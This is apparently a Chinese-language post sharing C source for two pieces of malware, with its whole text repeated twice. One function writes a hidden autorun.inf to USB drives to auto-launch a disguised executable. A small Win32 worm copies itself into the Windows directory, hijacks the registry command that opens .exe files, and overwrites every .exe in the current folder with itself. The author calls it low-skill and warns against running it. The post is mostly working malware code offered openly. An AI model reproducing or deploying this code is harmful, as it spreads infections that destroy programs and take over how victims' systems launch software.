下面是最常见的感染U盘的代码,很好理解,网上的代码,没有改。
void cfile(LPCTSTR drivers)
{
HANDLE hCFN;
char ch1[MAX_PATH];
DWORD filesize1 , wsize;
wsprintf(ch1,"%sautorun.inf",drivers);
char autorunc[]="[AutoRun] /n open=Recycled//notepad.exe /n ` /n shell//open=打开(&O)/nshell//open//Command=Recycled//notepad.exe /n shell//open//Default=1";
filesize1=sizeof(autorunc);
hCFN=CreateFile(ch1,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
WriteFile(hCFN,autorunc,filesize1-1,&wsize,NULL);
SetFileAttributes(ch1,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
CloseHandle(hCFN);
}
还有这一段代码很有意思,作者貌似是俄罗斯人的一个新人,你可以在29A的论坛上找到这段代码,基本上就说明了如何自启动,但是没有做基本的除错和传播,还有他是暴力覆盖方法。。。类似前一阵子的小浩,编译了后不要随便运行。。。否则后果自负。
#include "windows.h"
#include "string.h"
int main(int argc, char *fuck[])
{
char windir[200];
char dropper[10]="//supa.exe";
char param1[4]=" %1";
char subkey[40]="exefile//shell//open//command";
HANDLE find_handle;
WIN32_FIND_DATA ff;
char msg1[200]="[ Worm Win32 -+w32.exe.IRC+- For The Mather Russia and Zaicev Dimon ]";
GetWindowsDirectoryA(windir,100);
lstrcatA(windir,dropper);
CopyFileA(fuck[0],windir,0);
lstrcatA(windir,param1);
RegOpenKeyA(HKEY_CLASSES_ROOT,subkey,0);
RegSetValueA(HKEY_CLASSES_ROOT,subkey,REG_SZ,windir,sizeof(windir));
RegCloseKey(HKEY_CLASSES_ROOT);
if (argc>1)
{
CopyFileA(fuck[0],fuck[1],0);
exit(0);
}
find_handle=FindFirstFileA("*.exe",&ff);
while (1)
{
CopyFileA(fuck[0],ff.cFileName,0);
if (!FindNextFileA(find_handle,&ff)) break;
}
FindClose(find_handle);
return (0);
}
都没啥技术含量,权当一乐。
void cfile(LPCTSTR drivers)
{
HANDLE hCFN;
char ch1[MAX_PATH];
DWORD filesize1 , wsize;
wsprintf(ch1,"%sautorun.inf",drivers);
char autorunc[]="[AutoRun] /n open=Recycled//notepad.exe /n ` /n shell//open=打开(&O)/nshell//open//Command=Recycled//notepad.exe /n shell//open//Default=1";
filesize1=sizeof(autorunc);
hCFN=CreateFile(ch1,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
WriteFile(hCFN,autorunc,filesize1-1,&wsize,NULL);
SetFileAttributes(ch1,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
CloseHandle(hCFN);
}
还有这一段代码很有意思,作者貌似是俄罗斯人的一个新人,你可以在29A的论坛上找到这段代码,基本上就说明了如何自启动,但是没有做基本的除错和传播,还有他是暴力覆盖方法。。。类似前一阵子的小浩,编译了后不要随便运行。。。否则后果自负。
#include "windows.h"
#include "string.h"
int main(int argc, char *fuck[])
{
char windir[200];
char dropper[10]="//supa.exe";
char param1[4]=" %1";
char subkey[40]="exefile//shell//open//command";
HANDLE find_handle;
WIN32_FIND_DATA ff;
char msg1[200]="[ Worm Win32 -+w32.exe.IRC+- For The Mather Russia and Zaicev Dimon ]";
GetWindowsDirectoryA(windir,100);
lstrcatA(windir,dropper);
CopyFileA(fuck[0],windir,0);
lstrcatA(windir,param1);
RegOpenKeyA(HKEY_CLASSES_ROOT,subkey,0);
RegSetValueA(HKEY_CLASSES_ROOT,subkey,REG_SZ,windir,sizeof(windir));
RegCloseKey(HKEY_CLASSES_ROOT);
if (argc>1)
{
CopyFileA(fuck[0],fuck[1],0);
exit(0);
}
find_handle=FindFirstFileA("*.exe",&ff);
while (1)
{
CopyFileA(fuck[0],ff.cFileName,0);
if (!FindNextFileA(find_handle,&ff)) break;
}
FindClose(find_handle);
return (0);
}